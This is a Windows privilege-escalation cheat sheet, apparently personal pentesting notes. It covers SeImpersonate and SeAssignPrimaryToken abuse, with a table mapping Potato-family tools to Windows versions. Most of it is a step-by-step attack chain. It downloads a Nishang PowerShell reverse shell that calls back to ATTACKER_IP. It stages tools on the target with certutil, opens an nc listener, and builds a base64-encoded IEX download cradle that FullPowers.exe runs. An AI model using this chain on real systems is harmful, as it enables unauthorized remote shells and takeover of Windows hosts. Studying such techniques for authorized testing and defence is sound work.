SEIMPERSONATEPRIVILEGE & SEASSIGNPRIMARYTOKENPRIVILEGE

PRIMARY CATEGORY → WINDOWS PRIVESC

Theory

Privesc Tool ↔ Windows OS Version

Windows Server

OS VERSION	TOOL
WS 2008 WS 2008 R2	RottenPotato LonelyPotato
WS 2012 WS 2012 R2	JuicyPotato
WS 2016	JuicyPotato PrintSpoofer
WS 2019	PrintSpoofer RoguePotato
WS 2022	GodPotato SigmaPotato

Windows Desktop

OS VERSION	TOOL
Windows 7 Windows 8 Windows 8.1	RottenPotato JuicyPotato
Windows 10 < 1809	JuicyPotato
Windows 10 > 1809	PrintSpoofer RoguePotato
Windows 11	GodPotato SigmaPotato

---

Enumeration

whoami /priv

---

Enabling Token Privileges

FullPowers

FullPowers

It is basically a PoC made for automatically recovering the default privileges set of a service account including seImpersonate and seAssignPrimaryToken privileges

Setup

• Downloading the binary

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe'

• Downloading a TCP Reverse Shell

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1' --output rev.ps1

• Setting up a the Reverse Shell

From the attacker ⚔️

nvim !$

Rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER_IP>',<ATTACKER_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = ...<SNIP>...

• Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir $env:systemroot\Temp\LPE
cd $env:systemroot\Temp\LPE

certutil.exe -urlcache -split -f http://<ATTACKER_IP>/FullPowers.exe

• Setting up TCP Listener

From the attacker ⚔️

rlwrap -CaR nc -nlvp <ATTACKER_PORT>

• Creating a base64-encoded powershell payload

To request the Rev. Shell resource ( HTTP ) and evalute its content

From the attacker ⚔️

echo -n 'IEX (New-Object Net.WebClient).downloadString("http://<ATTACKER_IP>/rev.ps1")' | iconv --from-code UTF-8 --to-code UTF-16LE | base64 -w 0 ; echo

• Setting up an HTTP Server

From the attacker ⚔️

python3 -m http.server 80

Usage

.\FullPowers.exe -c 'powershell.exe -EncodedCommand SQBFAFgAIAAoAwBi...<SNIP>...'

---

Components ⟡

• 
  • POTATOES
• 
  • PRINTSPOOFER